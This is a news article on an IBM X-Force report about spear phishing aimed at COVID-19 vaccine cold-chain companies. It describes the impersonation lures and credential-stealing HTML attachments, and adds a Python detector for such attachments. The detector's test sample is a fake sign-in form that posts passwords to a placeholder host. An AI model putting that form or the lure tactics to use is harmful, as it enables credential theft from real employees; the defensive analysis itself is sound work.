The global COVID-19 vaccine cold chain continues to be targeted by advanced persistent threat groups, according to an updated report from IBM Security X-Force. X-Force researchers previously published a report in December 2020 warning that cyber adversaries were targeting the COVID-19 cold chain to gain access to vaccine data, and these attacks continue to pose a major threat to vaccine distribution and storage.
There are currently more than 350 logistics partners that are part of the cold chain and are involved in the delivery and storage of vaccines at low temperatures. Since the initial report was published on cold chain phishing attacks, IBM X-Force researchers have identified a further 50 email message files tied to spear phishing campaigns, which have targeted 44 companies in 14 countries throughout Europe, the Americas, Africa, and Asia.
The companies being targeted underpin the transport, warehousing, storage, and distribution of COVID-19 vaccines. The most targeted organizations are involved in transportation, IT and electronics, and healthcare, such as companies in biomedical research, medical manufacturing, and pharmaceutical and hygiene services.
Threat actors, believed to be backed by nation states, have expanded their campaigns and are using spear phishing emails to steal the credentials of CEOs, global sales officers, purchasing managers, HR officers, heads of plant engineering and others. The goal is to gain privileged insight into national Advance Market Commitment (AMC) negotiations related to the procurement of vaccines, timetables for distribution, information on the passage of vaccines through nations and territories, export controls and international property rights, World Trade Organization (WTO) trade facilitation agreements, technical vaccine information, and other sensitive data.
The threat group behind this campaign appears to have an in-depth understanding of the vaccine cold chain. The emails used in the spear phishing campaign impersonate an executive from the Chinese biomedical company Haier Biomedical, which is the world's only complete cold chain provider.
The emails request price quotations for service contracts regarding the Cold Chain Equipment Optimization Platform (CCEOP) program and reference products such as a solar-powered vaccine refrigerator and an ice-lined refrigerator from the Haier Biomedical product line. The emails also mention organizations involved in petrochemical production and the manufacturing of solar panels that align with those products, and the language used in the email reflects the educational background of the sender spoofed in the signature block.
The emails carry malicious HTML attachments that open locally in the recipient's browser and ask the user to enter their credentials to view the file. If credentials are entered, they are captured and exfiltrated to the attackers' command and control server.
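One way a mail gateway or an analyst could triage attachments of this kind, as an added example that is not part of the IBM report: it parses an HTML attachment (a constructed sample below, with a placeholder host rather than any indicator from the report) and reports every password form that would submit to an external server. A standalone HTML file has no legitimate reason to collect a password and send it to a remote host.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a minimal HTML attachment of the kind described above,
# a fake "sign in to view the document" form posting to a remote host.
# The host name is a placeholder, not an indicator from the report.
SAMPLE_ATTACHMENT = """
<html><body>
<p>Quotation_CCEOP.pdf - sign in to view this document</p>
<form method="post" action="https://collector.example.invalid/submit">
  <input type="text" name="email">
  <input type="password" name="passwd">
  <input type="submit" value="View">
</form>
</body></html>
"""

class CredentialFormScanner(HTMLParser):
    """Collects form action URLs and counts password inputs in an HTML document."""
    def __init__(self):
        super().__init__()
        self.actions = []          # action attribute of every <form>
        self.password_inputs = 0   # number of <input type="password">

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1

def scan_attachment(html):
    """Return the external hosts a password form in `html` would submit to.

    An empty list means no password form, or a form with no remote action.
    Forms exfiltrated purely via script are outside this simple heuristic.
    """
    scanner = CredentialFormScanner()
    scanner.feed(html)
    if scanner.password_inputs == 0:
        return []
    hosts = []
    for action in scanner.actions:
        parsed = urlparse(action)
        if parsed.scheme in ("http", "https") and parsed.netloc:
            hosts.append(parsed.netloc)
    return hosts

if __name__ == "__main__":
    hits = scan_attachment(SAMPLE_ATTACHMENT)
    print("credential form posting to:", hits if hits else "none")
```

Any non-empty result is worth an alert and a block of the attachment, and the reported host is a candidate for DNS and proxy log searches across the organization.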
“While our previous reporting featured direct targeting of supranational organizations, the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat,” wrote the researchers.
With vaccine nationalism and global competition related to access to vaccines, attacks that disrupt the cold chain were inevitable. While the researchers have not been able to attribute the campaign to any threat group, there is a strong likelihood that this is a nation state operation.
If the cold chain is disrupted, it could result in delays in delivering the vaccines or could disrupt the conditions required for safe vaccine transport and storage, which could render the vaccines unsafe or useless. IBM has published Indicators of Compromise in its report to help organizations in the COVID-19 cold chain protect against these attacks.